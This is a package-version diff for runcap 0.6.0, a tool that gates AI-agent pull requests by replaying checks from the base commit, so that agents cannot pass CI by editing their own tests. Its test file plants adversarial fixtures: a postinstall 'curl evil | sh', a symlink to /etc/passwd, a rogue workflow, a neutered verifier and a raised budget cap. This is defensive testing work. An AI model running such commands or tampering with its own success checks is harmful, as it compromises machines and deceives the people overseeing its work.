runcap 0.5.0 → 0.6.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +49 -36
- package/bin/runcap.mjs +39 -21
- package/examples/runcap-adjudicate.yml +57 -0
- package/package.json +15 -12
- package/scripts/adjudicate-test.mjs +334 -0
- package/src/adjudicate.mjs +508 -0
package/README.md
CHANGED
|
@@ -4,7 +4,7 @@
|
|
|
4
4
|
|
|
5
5
|

|
|
6
6
|
|
|
7
|
-
**
|
|
7
|
+
**An AI coding agent can pass CI by editing the test that proves its own success. Runcap caps the spend before the run and issues evidence about whether that success check can be trusted. Free, MIT, local-first. Local runs keep Runcap's control plane on your machine; optional CI adjudication runs in your GitHub Actions environment.**
|
|
8
8
|
|
|
9
9
|
> **An agent passing CI is not enough.**
|
|
10
10
|
> Runcap verifies whether the evidence of success was altered during the mission.
|
|
@@ -20,7 +20,7 @@
|
|
|
20
20
|
Estimate the run → Cap the spend → Verify the outcome
|
|
21
21
|
```
|
|
22
22
|
|
|
23
|
-
|
|
23
|
+
Most cost and observability tools measure **tokens** used. But you don't buy tokens - you buy a result that passes a check. So Runcap measures the number that actually decides whether the spend was worth it:
|
|
24
24
|
|
|
25
25
|
> **Verified Outcome Cost = total run cost / tasks that passed verification.** An agent that talks but never fixes the bug can cost *more* than one that does - and a token dashboard calls it "cheaper."
|
|
26
26
|
|
|
@@ -32,15 +32,38 @@ Every other tool measures **tokens**. You don't buy tokens - you buy a result th
|
|
|
32
32
|
|
|
33
33
|
In a 6-run test on the same task, the run that **delivered nothing** cost *more* than the one that delivered, and the cheapest verified result was ~43x cheaper than the most expensive - same passing test. ([full table below](#real-results-6-runs-same-task-reproducible-offline))
|
|
34
34
|
|
|
35
|
-
>
|
|
35
|
+
> Most tools here are a rear-view mirror - they show you the bill *after* you paid it. Runcap estimates the bill *before* you start, caps it during the run, and issues evidence about whether the declared verification can be trusted. It is a circuit breaker with a receipt, not a dashboard.
|
|
36
36
|
|
|
37
37
|
> If Runcap caps a run for you or compresses a call, please **star the repo** - it is the one signal that tells me to keep building it in the open.
|
|
38
38
|
|
|
39
|
+
## Make a change earn merge eligibility
|
|
40
|
+
|
|
41
|
+
> AI can propose a change.
|
|
42
|
+
> Runcap makes it earn merge eligibility.
|
|
43
|
+
|
|
44
|
+
`runcap ci --mode adjudicate` is a required PR check that does not trust the agent or its receipt. It recomputes the merge decision in a clean CI job from the pull request's **base commit**:
|
|
45
|
+
|
|
46
|
+
```text
|
|
47
|
+
AI-generated PR
|
|
48
|
+
→ Runcap action pinned to an immutable release commit
|
|
49
|
+
→ policy / verifier / dependencies read from the PR base commit
|
|
50
|
+
→ clean CI replay
|
|
51
|
+
→ PASS / BLOCKED / HUMAN_APPROVAL_REQUIRED
|
|
52
|
+
```
|
|
53
|
+
|
|
54
|
+
- **`PASS`** - the base verifier failed, the replay passed, and the change was allowed text-only edits inside scope.
|
|
55
|
+
- **`BLOCKED`** - a scope violation, an unsafe diff type (delete / rename / binary / symlink / submodule / mode change), an unresolved base/head identity, or a failed replay.
|
|
56
|
+
- **`HUMAN_APPROVAL_REQUIRED`** - the change touches the policy, a workflow, a verifier file, a dependency manifest/lockfile, or a protected path. Runcap does not auto-approve changes to its own rules or evidence; a human CODEOWNER must approve.
|
|
57
|
+
|
|
58
|
+
The verdict is a **CI-attested replay under a documented hardened GitHub profile**. It is *not* "unspoofable," *not* "fully independent," and it is *not* independent budget enforcement - its integrity rests on the [required GitHub setup](docs/trust-model.md#required-github-setup) being in place. The agent's receipt never decides the verdict: the required gate does not read it.
|
|
59
|
+
|
|
60
|
+
See the [trust model](docs/trust-model.md#ci-adjudication-v06) for exactly what v0.6 proves and what it does not, and [Install in a consumer repo](#install-in-a-consumer-repo) to wire it up.
|
|
61
|
+
|
|
39
62
|
## Why
|
|
40
63
|
|
|
41
64
|
**Agents loop on the same error, rewrite plans, and re-read files they just edited - every loop is tokens you pay for.** Multi-agent coding runs burn roughly **15x more tokens** than a single chat ([Anthropic engineering](https://www.anthropic.com/engineering/built-multi-agent-research-system)). They hand you a confident summary while the task is not actually done, and you find out what it cost when the invoice - or the subscription limit - arrives.
|
|
42
65
|
|
|
43
|
-
Observability tools (Langfuse, Helicone, LangSmith, AgentOps) measure the past. Gateways (LiteLLM, Portkey, OpenRouter) route the present.
|
|
66
|
+
Observability tools (Langfuse, Helicone, LangSmith, AgentOps) measure the past, and some run evals on outputs. Gateways (LiteLLM, Portkey, OpenRouter) route the present. What they don't do is enforce a mission policy *during* the run - a hard spend cap, allowed scope, protected verification evidence - then issue evidence about whether the agent's own success check can be trusted. Runcap does the things the rear-view mirror can't:
|
|
44
67
|
|
|
45
68
|
```text
|
|
46
69
|
estimate before build → cap during run → compress every call → rescue when stuck → verify the outcome
|
|
@@ -164,7 +187,7 @@ Every request that passes through the gateway is compressed before it's forwarde
|
|
|
164
187
|
|
|
165
188
|
1. **Per-field trim** - embedded JSON re-serialized compactly, long log/stack-trace dumps collapsed to head + tail, trailing whitespace squeezed.
|
|
166
189
|
2. **Identical-block dedup** - when the exact same file dump or tool_result ships again in the same request, the repeat is replaced with a deterministic stub.
|
|
167
|
-
3. **Delta-encoding of near-duplicates
|
|
190
|
+
3. **Delta-encoding of near-duplicates.** When the agent reads a file, edits one line, and re-reads it, the block is *similar but not identical*, so plain dedup saves nothing. Runcap sends a readable line-diff against the version the model already saw, and the model reconstructs the current file from it. On a real OpenAI call, an edited-file re-read dropped from **1186 to 737 prompt tokens - 37.9% saved, with the model still answering correctly about the changed line.** Proof and reproduction steps: [docs/delta-encoding-evidence.md](https://github.com/kirder24-code/ai-agent-manager/blob/main/docs/delta-encoding-evidence.md).
|
|
168
191
|
|
|
169
192
|
It's pure Node with **zero native or ML dependencies** (the only runtime dependency is `js-yaml`, pure JS), so it installs everywhere without the build pain heavier compressors have.
|
|
170
193
|
|
|
@@ -301,30 +324,24 @@ runcap mission run -- claude "fix the failing checkout test, then stop"
|
|
|
301
324
|
- spend exceeded `mission_hard_limit_usd`, or the gateway's budget guard tripped mid-run;
|
|
302
325
|
- `max_llm_calls` or `max_runtime_minutes` was exceeded.
|
|
303
326
|
|
|
304
|
-
### The
|
|
327
|
+
### The local grade vs. the CI adjudication
|
|
305
328
|
|
|
306
|
-
|
|
307
|
-
# .github/workflows/runcap.yml
|
|
308
|
-
jobs:
|
|
309
|
-
runcap-mission:
|
|
310
|
-
runs-on: ubuntu-latest
|
|
311
|
-
steps:
|
|
312
|
-
- uses: actions/checkout@v4
|
|
313
|
-
- uses: actions/setup-node@v4
|
|
314
|
-
with: { node-version: 20 }
|
|
315
|
-
# 1. Run the agent under the policy (produces a graded receipt + exits 1 on BLOCKED)
|
|
316
|
-
- run: npx runcap mission run -- <your agent command>
|
|
317
|
-
# 2. Grade the latest receipt against the committed policy and annotate the PR
|
|
318
|
-
- uses: kirder24-code/ai-agent-manager@v1
|
|
319
|
-
with:
|
|
320
|
-
policy: .runcap/mission.yaml
|
|
321
|
-
```
|
|
329
|
+
There are two ways the policy verdict reaches a PR, and they trust different things:
|
|
322
330
|
|
|
323
|
-
|
|
331
|
+
- **`runcap mission run`** (local / same-job) grades the run it just executed and re-checks it against the committed policy text. Useful, but the receipt it produces is *agent-side* evidence.
|
|
332
|
+
- **`runcap ci --mode adjudicate`** (the required PR check) trusts none of that. It recomputes the verdict in a clean CI job from the PR's base commit and **never reads the agent receipt**. This is the gate that decides merge eligibility.
|
|
324
333
|
|
|
325
|
-
|
|
326
|
-
|
|
327
|
-
|
|
334
|
+
### Install in a consumer repo
|
|
335
|
+
|
|
336
|
+
Make the adjudication a required red/green PR check in your own repo:
|
|
337
|
+
|
|
338
|
+
1. Add `.runcap/mission.yaml` (the policy - see the example above).
|
|
339
|
+
2. Copy `examples/runcap-adjudicate.yml` into `.github/workflows/`.
|
|
340
|
+
3. Replace the all-zero `RUNCAP_ACTION_SHA` placeholder with the full immutable commit SHA of the released version (resolve it with `gh api repos/kirder24-code/ai-agent-manager/git/refs/tags/vX.Y.Z --jq '.object.sha'`).
|
|
341
|
+
4. Configure the hardened GitHub branch profile (protected branch, required check, up-to-date-before-merge, dismiss stale approvals, CODEOWNERS for workflow/policy/verifier/dependency/protected paths, no bypass for ordinary authors) - the full list is in the [trust model](docs/trust-model.md#required-github-setup).
|
|
342
|
+
5. Make `Runcap adjudicate` a required status check.
|
|
343
|
+
|
|
344
|
+
> The template ships with an all-zero placeholder SHA and is **intentionally not runnable until you insert the release SHA**. This is deliberate: the judge must be an immutable release commit that lives outside the candidate PR, so a malicious PR cannot rewrite its own judge.
|
|
328
345
|
|
|
329
346
|
A reviewer sees one of two things:
|
|
330
347
|
|
|
@@ -361,20 +378,16 @@ Runcap is built not to fake certainty. Every important output carries a truth la
|
|
|
361
378
|
|
|
362
379
|
If it cannot prove something, it says so.
|
|
363
380
|
|
|
364
|
-
##
|
|
381
|
+
## Availability
|
|
365
382
|
|
|
366
|
-
|
|
367
|
-
|---|---|---|
|
|
368
|
-
| **OSS** (MIT, local) | $0 forever | All local runs, cost estimation, hard cap, run wrapping, stuck detection, rescue prompts, local dashboard. Never crippleware. |
|
|
369
|
-
| **Founding Pro** (limited) | **$49 once** | Lifetime Pro at the founder price - pay once, keep Pro forever, before it moves to $19/mo. |
|
|
370
|
-
| **Pro** | $19/mo | Cloud sync across machines, hosted dashboard, estimate-vs-actual trends, shareable reports, alerts on cap breach |
|
|
371
|
-
| **Team** | $49/seat/mo | Shared budget pools, org-wide ceilings, per-project rollups, role-based caps |
|
|
383
|
+
Runcap v0.6 is open-source and free under MIT.
|
|
372
384
|
|
|
373
|
-
The local
|
|
385
|
+
The local CLI and CI adjudication mode are available now.
|
|
386
|
+
Hosted sync, team budget pools, organization reporting, and paid plans are future ideas only. They are not available for purchase today.
|
|
374
387
|
|
|
375
388
|
## Current stage
|
|
376
389
|
|
|
377
|
-
A working local tool, not a hosted SaaS. Ready for: wrapping real Codex / Claude / Cursor sessions, catching stuck agents,
|
|
390
|
+
A working local tool plus an optional CI adjudication mode, not a hosted SaaS. Ready for: wrapping real Codex / Claude / Cursor sessions, catching stuck agents, proving rescue prompts save time, and gating AI-generated pull requests in GitHub Actions. Not yet: a hosted cloud platform or a universal observability standard. It is not trying to replace Langfuse or LiteLLM; it focuses on a different layer - pre-run cost caps and merge-eligibility evidence.
|
|
378
391
|
|
|
379
392
|
## Documentation
|
|
380
393
|
|
|
@@ -391,4 +404,4 @@ Runcap is built and maintained by Kirill D., a solo AI and automation consultant
|
|
|
391
404
|
|
|
392
405
|
---
|
|
393
406
|
|
|
394
|
-
The thesis: **AI
|
|
407
|
+
The thesis: **AI can propose a change. It should not certify its own success.**
|
package/bin/runcap.mjs
CHANGED
|
@@ -41,6 +41,7 @@ import {
|
|
|
41
41
|
policyMeta,
|
|
42
42
|
formatPolicyBlock
|
|
43
43
|
} from "../src/policy.mjs";
|
|
44
|
+
import { adjudicate, formatAdjudication, exitCodeFor } from "../src/adjudicate.mjs";
|
|
44
45
|
import { readFileSync, appendFileSync } from "node:fs";
|
|
45
46
|
|
|
46
47
|
const args = process.argv.slice(2);
|
|
@@ -61,6 +62,9 @@ Usage:
|
|
|
61
62
|
(enforce the repo policy; exit 1 if the mission is BLOCKED)
|
|
62
63
|
runcap ci [--policy path] [--receipt path]
|
|
63
64
|
(grade a receipt against the policy; writes PR summary, exit 1 on BLOCKED)
|
|
65
|
+
runcap ci --mode adjudicate [--policy path] [--base sha --head sha]
|
|
66
|
+
(Tier 3: recompute the verdict in CI from the PR's base commit -
|
|
67
|
+
never trusts the agent's receipt; exit 1 on BLOCKED)
|
|
64
68
|
runcap plans
|
|
65
69
|
runcap cap <usd> (set the hard cap the gateway enforces)
|
|
66
70
|
runcap cap show (show the current cap)
|
|
@@ -311,32 +315,46 @@ try {
|
|
|
311
315
|
if (result.receipt.policy?.verdict === "BLOCKED") process.exitCode = 1;
|
|
312
316
|
} else if (command === "ci") {
|
|
313
317
|
const ciArgs = args.slice(1);
|
|
318
|
+
const mode = takeOption(ciArgs, "--mode");
|
|
314
319
|
const policyPath = takeOption(ciArgs, "--policy");
|
|
315
320
|
const receiptPath = takeOption(ciArgs, "--receipt");
|
|
316
321
|
|
|
317
|
-
|
|
318
|
-
|
|
319
|
-
|
|
320
|
-
|
|
321
|
-
|
|
322
|
-
|
|
323
|
-
|
|
324
|
-
|
|
325
|
-
|
|
326
|
-
|
|
327
|
-
|
|
328
|
-
receipt = JSON.parse(readFileSync(receiptPath, "utf8"));
|
|
322
|
+
if (mode === "adjudicate") {
|
|
323
|
+
// Tier 3: recompute the verdict from the BASE commit of the PR in a clean
|
|
324
|
+
// checkout. Trusts only the base/head SHAs from the pull_request event (or
|
|
325
|
+
// explicit --base/--head for local runs); never the agent's receipt.
|
|
326
|
+
const baseFlag = takeOption(ciArgs, "--base");
|
|
327
|
+
const headFlag = takeOption(ciArgs, "--head");
|
|
328
|
+
const verdict = await adjudicate({ cwd: process.cwd(), baseFlag, headFlag, policyPath });
|
|
329
|
+
const lines = formatAdjudication(verdict);
|
|
330
|
+
console.log(lines.join("\n"));
|
|
331
|
+
writeCiSummary(["## Runcap CI adjudication: " + verdict.verdict, "", "```", ...lines, "```"].join("\n"));
|
|
332
|
+
process.exitCode = exitCodeFor(verdict.verdict);
|
|
329
333
|
} else {
|
|
330
|
-
const
|
|
331
|
-
if (!
|
|
332
|
-
|
|
333
|
-
|
|
334
|
+
const loaded = loadPolicy(process.cwd(), policyPath);
|
|
335
|
+
if (!loaded) throw new Error("No policy found. Create .runcap/mission.yaml (or pass --policy <path>).");
|
|
336
|
+
const { ok, errors } = validatePolicy(loaded.policy);
|
|
337
|
+
if (!ok) {
|
|
338
|
+
for (const e of errors) console.error(` policy error: ${e}`);
|
|
339
|
+
writeCiSummary(["## Runcap mission: policy INVALID", "", ...errors.map((e) => `- ${e}`)].join("\n"));
|
|
340
|
+
throw new Error("Mission policy is invalid.");
|
|
341
|
+
}
|
|
342
|
+
|
|
343
|
+
let receipt;
|
|
344
|
+
if (receiptPath) {
|
|
345
|
+
receipt = JSON.parse(readFileSync(receiptPath, "utf8"));
|
|
346
|
+
} else {
|
|
347
|
+
const id = await latestOutcomeId();
|
|
348
|
+
if (!id) throw new Error("No outcome receipt found. Run `runcap mission run ...` first, or pass --receipt <path>.");
|
|
349
|
+
receipt = JSON.parse(readFileSync(`.runcap/outcomes/${id}/receipt.json`, "utf8"));
|
|
350
|
+
}
|
|
334
351
|
|
|
335
|
-
|
|
336
|
-
|
|
337
|
-
|
|
338
|
-
|
|
339
|
-
|
|
352
|
+
const verdict = evaluatePolicyVerdict(receipt, loaded.policy);
|
|
353
|
+
const block = formatPolicyBlock({ ...policyMeta(loaded), ...verdict });
|
|
354
|
+
console.log(block.join("\n"));
|
|
355
|
+
writeCiSummary(["## Runcap mission verdict: " + verdict.verdict, "", "```", ...block, "```"].join("\n"));
|
|
356
|
+
if (verdict.verdict === "BLOCKED") process.exitCode = 1;
|
|
357
|
+
}
|
|
340
358
|
} else if (command === "login") {
|
|
341
359
|
console.log(await loginCommand(args[1]));
|
|
342
360
|
} else if (command === "logout") {
|
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
# Reference workflow: drop this into a CONSUMER repo at
|
|
2
|
+
# .github/workflows/runcap-adjudicate.yml to make Runcap's independent verdict a
|
|
3
|
+
# required red/green PR check.
|
|
4
|
+
#
|
|
5
|
+
# The whole point of Tier 3 is that the JUDGE is not the candidate. This
|
|
6
|
+
# workflow therefore NEVER runs code from the pull request's workspace - no
|
|
7
|
+
# `node ./bin/runcap.mjs`, no `uses: ./`, no `npm ci` of the PR's manifest. The
|
|
8
|
+
# adjudicator comes only from the Runcap action pinned by a FULL 40-character
|
|
9
|
+
# commit SHA, so a malicious PR cannot rewrite its own judge. The checkout below
|
|
10
|
+
# brings in the PR's git history purely as DATA: the adjudicator reads the base
|
|
11
|
+
# commit's policy and replays the base-pinned verifier in a clean worktree it
|
|
12
|
+
# creates itself. Workspace files are never executed as the judge.
|
|
13
|
+
#
|
|
14
|
+
# Security posture (every line is load-bearing):
|
|
15
|
+
# - `on: pull_request` (NOT pull_request_target): a fork PR runs with a
|
|
16
|
+
# read-only token and no access to repo secrets.
|
|
17
|
+
# - `permissions: contents: read`: the only scope granted.
|
|
18
|
+
# - Every action pinned by full commit SHA, never a floating tag, so the bytes
|
|
19
|
+
# that run are immutable.
|
|
20
|
+
# - `persist-credentials: false`: the checkout token is not left on disk for
|
|
21
|
+
# PR-controlled steps to find.
|
|
22
|
+
# - GitHub-hosted runner, capped runtime, single self-sufficient required
|
|
23
|
+
# check with no `needs:` on any upstream job.
|
|
24
|
+
#
|
|
25
|
+
# Pin RUNCAP_ACTION_SHA to the commit a Runcap release tag points at. Resolve it
|
|
26
|
+
# with: gh api repos/kirder24-code/ai-agent-manager/git/refs/tags/vX.Y.Z --jq '.object.sha'
|
|
27
|
+
name: Runcap adjudicate
|
|
28
|
+
|
|
29
|
+
on:
|
|
30
|
+
pull_request:
|
|
31
|
+
|
|
32
|
+
permissions:
|
|
33
|
+
contents: read
|
|
34
|
+
|
|
35
|
+
jobs:
|
|
36
|
+
adjudicate:
|
|
37
|
+
runs-on: ubuntu-latest
|
|
38
|
+
timeout-minutes: 10
|
|
39
|
+
steps:
|
|
40
|
+
- name: Checkout (full history so the base commit is available, no token left on disk)
|
|
41
|
+
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
|
|
42
|
+
with:
|
|
43
|
+
fetch-depth: 0
|
|
44
|
+
persist-credentials: false
|
|
45
|
+
|
|
46
|
+
- name: Setup Node
|
|
47
|
+
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
|
|
48
|
+
with:
|
|
49
|
+
node-version: 22
|
|
50
|
+
|
|
51
|
+
# The judge: the Runcap action pinned by a full commit SHA. Replace the SHA
|
|
52
|
+
# below with the commit a published Runcap release tag points at. This is
|
|
53
|
+
# the ONLY code that decides the verdict, and it cannot come from the PR.
|
|
54
|
+
- name: Runcap independent adjudication
|
|
55
|
+
uses: kirder24-code/ai-agent-manager@0000000000000000000000000000000000000000 # pin to a release SHA
|
|
56
|
+
with:
|
|
57
|
+
mode: adjudicate
|
package/package.json
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "runcap",
|
|
3
|
-
"version": "0.
|
|
4
|
-
"description": "
|
|
3
|
+
"version": "0.6.0",
|
|
4
|
+
"description": "Policy-bound budget enforcement and verification-integrity evidence for AI coding agents. Cap spend, enforce allowed scope, and fail the pull request when an agent tampers with its own success check. Local, MIT.",
|
|
5
5
|
"license": "MIT",
|
|
6
6
|
"type": "module",
|
|
7
7
|
"author": "Kirill D. <kirill@launchsoloai.com> (https://launchsoloai.com)",
|
|
@@ -15,16 +15,18 @@
|
|
|
15
15
|
},
|
|
16
16
|
"keywords": [
|
|
17
17
|
"ai",
|
|
18
|
-
"agent",
|
|
19
|
-
"
|
|
20
|
-
"
|
|
18
|
+
"ai-coding-agent",
|
|
19
|
+
"ai-agent-governance",
|
|
20
|
+
"agent-security",
|
|
21
|
+
"verification-integrity",
|
|
22
|
+
"policy-as-code",
|
|
23
|
+
"github-actions",
|
|
24
|
+
"ci",
|
|
25
|
+
"pull-request",
|
|
21
26
|
"budget",
|
|
22
|
-
"
|
|
23
|
-
"openai",
|
|
24
|
-
"gateway",
|
|
27
|
+
"cost",
|
|
25
28
|
"cli",
|
|
26
|
-
"llm"
|
|
27
|
-
"token-cost"
|
|
29
|
+
"llm"
|
|
28
30
|
],
|
|
29
31
|
"files": [
|
|
30
32
|
"bin/",
|
|
@@ -45,11 +47,12 @@
|
|
|
45
47
|
"acceptance": "node ./scripts/acceptance.mjs",
|
|
46
48
|
"smoke": "node ./bin/runcap.mjs run --label smoke -- npm --prefix examples/broken-ts-app run build",
|
|
47
49
|
"demo:broken": "node ./bin/runcap.mjs run --label broken-ts-demo -- npm --prefix examples/broken-ts-app run build",
|
|
48
|
-
"test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs && node ./scripts/outcome-test.mjs && node ./scripts/guard-test.mjs && node ./scripts/policy-test.mjs && node ./scripts/mission-test.mjs",
|
|
50
|
+
"test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs && node ./scripts/outcome-test.mjs && node ./scripts/guard-test.mjs && node ./scripts/policy-test.mjs && node ./scripts/mission-test.mjs && node ./scripts/adjudicate-test.mjs",
|
|
49
51
|
"test:outcome": "node ./scripts/outcome-test.mjs",
|
|
50
52
|
"test:guard": "node ./scripts/guard-test.mjs",
|
|
51
53
|
"test:policy": "node ./scripts/policy-test.mjs",
|
|
52
54
|
"test:mission": "node ./scripts/mission-test.mjs",
|
|
55
|
+
"test:tier3": "node ./scripts/adjudicate-test.mjs",
|
|
53
56
|
"outcome": "node ./bin/runcap.mjs outcome",
|
|
54
57
|
"test:delta": "node ./scripts/delta-test.mjs",
|
|
55
58
|
"test:loop": "node ./scripts/loop-test.mjs",
|
|
@@ -61,7 +64,7 @@
|
|
|
61
64
|
"screenshots": "node ./scripts/render-media-screenshots.mjs",
|
|
62
65
|
"gateway": "node ./bin/runcap.mjs gateway",
|
|
63
66
|
"fuel": "node ./bin/runcap.mjs fuel",
|
|
64
|
-
"check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs"
|
|
67
|
+
"check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs && node --check ./src/adjudicate.mjs"
|
|
65
68
|
},
|
|
66
69
|
"engines": {
|
|
67
70
|
"node": ">=20"
|
|
@@ -0,0 +1,334 @@
|
|
|
1
|
+
// Tier 3: proves the CI adjudicator recomputes the verdict from the PR's BASE
|
|
2
|
+
// commit and never trusts the agent's receipt. Everything runs offline inside a
|
|
3
|
+
// throwaway git repo. The adjudicator is driven both directly (the function) and
|
|
4
|
+
// through the real `bin/runcap.mjs ci --mode adjudicate` so the exit codes a
|
|
5
|
+
// reviewer's PR check would see are tested too.
|
|
6
|
+
//
|
|
7
|
+
// Verdict semantics under test:
|
|
8
|
+
// PASS -> exit 0
|
|
9
|
+
// BLOCKED -> exit 1
|
|
10
|
+
// HUMAN_APPROVAL_REQUIRED -> exit 0 (success/neutral: hands authority to a CODEOWNER)
|
|
11
|
+
//
|
|
12
|
+
// Threat scenarios: forged receipt, forged budget telemetry, no telemetry,
|
|
13
|
+
// honest pass, out-of-scope edit, baseline-already-green, clean-replay fail,
|
|
14
|
+
// protected/verifier/policy/workflow/dependency human gates, unresolved SHA,
|
|
15
|
+
// untrusted event, diff-smuggling (delete/symlink/binary), and two honesty
|
|
16
|
+
// checks: the verdict never claims runtime hardening attestation, and the
|
|
17
|
+
// dependency install is pinned + script-free.
|
|
18
|
+
|
|
19
|
+
import os from "node:os";
|
|
20
|
+
import path from "node:path";
|
|
21
|
+
import { fileURLToPath } from "node:url";
|
|
22
|
+
import { execFileSync } from "node:child_process";
|
|
23
|
+
import { mkdtempSync, writeFileSync, mkdirSync, rmSync, readFileSync, symlinkSync } from "node:fs";
|
|
24
|
+
|
|
25
|
+
const HERE = path.dirname(fileURLToPath(import.meta.url));
|
|
26
|
+
const SRC_DIR = process.env.RUNCAP_SRC ?? path.join(HERE, "..", "src");
|
|
27
|
+
const BIN = path.join(SRC_DIR, "..", "bin", "runcap.mjs");
|
|
28
|
+
const REPO_ROOT = path.join(HERE, "..");
|
|
29
|
+
|
|
30
|
+
const tmp = mkdtempSync(path.join(os.tmpdir(), "runcap-adj-"));
|
|
31
|
+
process.chdir(tmp);
|
|
32
|
+
|
|
33
|
+
let failures = 0;
|
|
34
|
+
const check = (name, pass, detail) => { if (!pass) failures++; console.log(`${pass ? "PASS" : "FAIL"} ${name}${detail ? " - " + detail : ""}`); };
|
|
35
|
+
|
|
36
|
+
const g = (...a) => execFileSync("git", a, { cwd: tmp, stdio: "pipe" }).toString().trim();
|
|
37
|
+
|
|
38
|
+
// --- base commit: a real failing task, a verifier, a policy, scope app/ -----
|
|
39
|
+
mkdirSync(path.join(tmp, "app"), { recursive: true });
|
|
40
|
+
mkdirSync(path.join(tmp, ".runcap"), { recursive: true });
|
|
41
|
+
writeFileSync(path.join(tmp, "app", "broken.mjs"), "export const ok = false;\n");
|
|
42
|
+
writeFileSync(path.join(tmp, "app", "verify.mjs"),
|
|
43
|
+
"import { ok } from './broken.mjs'; import assert from 'node:assert'; assert.strictEqual(ok, true, 'not fixed'); console.log('ok');\n");
|
|
44
|
+
writeFileSync(path.join(tmp, "app", "other.mjs"), "export const other = 0;\n");
|
|
45
|
+
writeFileSync(path.join(tmp, "rootfile.txt"), "root\n");
|
|
46
|
+
writeFileSync(path.join(tmp, "package.json"), JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build" } }, null, 2) + "\n");
|
|
47
|
+
writeFileSync(path.join(tmp, ".runcap", "mission.yaml"), `version: v1
|
|
48
|
+
identity:
|
|
49
|
+
project: checkout
|
|
50
|
+
team: payments
|
|
51
|
+
mission:
|
|
52
|
+
name: Fix the failing checkout test
|
|
53
|
+
task_class: bugfix
|
|
54
|
+
budget:
|
|
55
|
+
mission_hard_limit_usd: 5
|
|
56
|
+
verification:
|
|
57
|
+
command: "node app/verify.mjs"
|
|
58
|
+
guard: strict
|
|
59
|
+
protect: ["app/verify.mjs"]
|
|
60
|
+
allow: ["app/"]
|
|
61
|
+
`);
|
|
62
|
+
|
|
63
|
+
g("init", "-q");
|
|
64
|
+
g("config", "user.email", "test@runcap.local");
|
|
65
|
+
g("config", "user.name", "runcap-test");
|
|
66
|
+
g("config", "commit.gpgsign", "false");
|
|
67
|
+
g("add", "-A");
|
|
68
|
+
g("commit", "-qm", "baseline");
|
|
69
|
+
const BASE = g("rev-parse", "HEAD");
|
|
70
|
+
|
|
71
|
+
// Build every head commit up front so the working tree has no planted receipt
|
|
72
|
+
// while branches are created. Each head branches from BASE.
|
|
73
|
+
function makeHead(branch, mutate) {
|
|
74
|
+
g("checkout", "-q", "-b", branch, BASE);
|
|
75
|
+
mutate();
|
|
76
|
+
g("add", "-A");
|
|
77
|
+
g("commit", "-qm", branch);
|
|
78
|
+
const sha = g("rev-parse", "HEAD");
|
|
79
|
+
g("checkout", "-q", BASE);
|
|
80
|
+
return sha;
|
|
81
|
+
}
|
|
82
|
+
|
|
83
|
+
const w = (rel, content) => writeFileSync(path.join(tmp, rel), content);
|
|
84
|
+
const rmRel = (rel) => rmSync(path.join(tmp, rel), { force: true });
|
|
85
|
+
|
|
86
|
+
const HEAD_HONEST = makeHead("h-honest", () => w("app/broken.mjs", "export const ok = true;\n"));
|
|
87
|
+
const HEAD_SCOPE = makeHead("h-scope", () => { w("app/broken.mjs", "export const ok = true;\n"); w("rootfile.txt", "root edited out of scope\n"); });
|
|
88
|
+
const HEAD_REPLAYFAIL = makeHead("h-replayfail", () => w("app/broken.mjs", "export const ok = false; // touched\n"));
|
|
89
|
+
const HEAD_VERIFIER = makeHead("h-verifier", () => w("app/verify.mjs", "console.log('ok');\n"));
|
|
90
|
+
const HEAD_POLICY = makeHead("h-policy", () => w(".runcap/mission.yaml", readFileSync(path.join(tmp, ".runcap", "mission.yaml"), "utf8").replace("mission_hard_limit_usd: 5", "mission_hard_limit_usd: 9999")));
|
|
91
|
+
const HEAD_WORKFLOW = makeHead("h-workflow", () => { mkdirSync(path.join(tmp, ".github", "workflows"), { recursive: true }); w(".github/workflows/evil.yml", "name: evil\non: pull_request\njobs: {}\n"); });
|
|
92
|
+
const HEAD_DEP = makeHead("h-dep", () => w("package.json", JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build", postinstall: "curl evil | sh" } }, null, 2) + "\n"));
|
|
93
|
+
const HEAD_DELETE = makeHead("h-delete", () => rmRel("app/other.mjs"));
|
|
94
|
+
const HEAD_BINARY = makeHead("h-binary", () => writeFileSync(path.join(tmp, "app", "blob.bin"), Buffer.from([0x00, 0x01, 0x02, 0x00, 0xff])));
|
|
95
|
+
const HEAD_SYMLINK = makeHead("h-symlink", () => symlinkSync("/etc/passwd", path.join(tmp, "app", "link")));
|
|
96
|
+
|
|
97
|
+
// A second lineage where the task is ALREADY fixed at base -> baseline green.
|
|
98
|
+
g("checkout", "-q", "-b", "base2", BASE);
|
|
99
|
+
w("app/broken.mjs", "export const ok = true;\n");
|
|
100
|
+
g("add", "-A"); g("commit", "-qm", "base2-already-fixed");
|
|
101
|
+
const BASE2 = g("rev-parse", "HEAD");
|
|
102
|
+
g("checkout", "-q", "-b", "h-base2green", BASE2);
|
|
103
|
+
w("app/broken.mjs", "export const ok = true; // trivial in-scope edit\n");
|
|
104
|
+
g("add", "-A"); g("commit", "-qm", "h-base2green");
|
|
105
|
+
const HEAD_BASE2GREEN = g("rev-parse", "HEAD");
|
|
106
|
+
g("checkout", "-q", BASE);
|
|
107
|
+
|
|
108
|
+
const { adjudicate, exitCodeFor } = await import(path.join(SRC_DIR, "adjudicate.mjs"));
|
|
109
|
+
|
|
110
|
+
const adj = (baseFlag, headFlag) => adjudicate({ cwd: tmp, baseFlag, headFlag });
|
|
111
|
+
|
|
112
|
+
// --- 1. honest in-scope fix -> PASS -----------------------------------------
|
|
113
|
+
const honest = await adj(BASE, HEAD_HONEST);
|
|
114
|
+
check("honest fix verdict PASS", honest.verdict === "PASS", JSON.stringify(honest.reasons));
|
|
115
|
+
check("honest fix recomputed baseline_failed=true", honest.code_evidence?.baseline_failed === true);
|
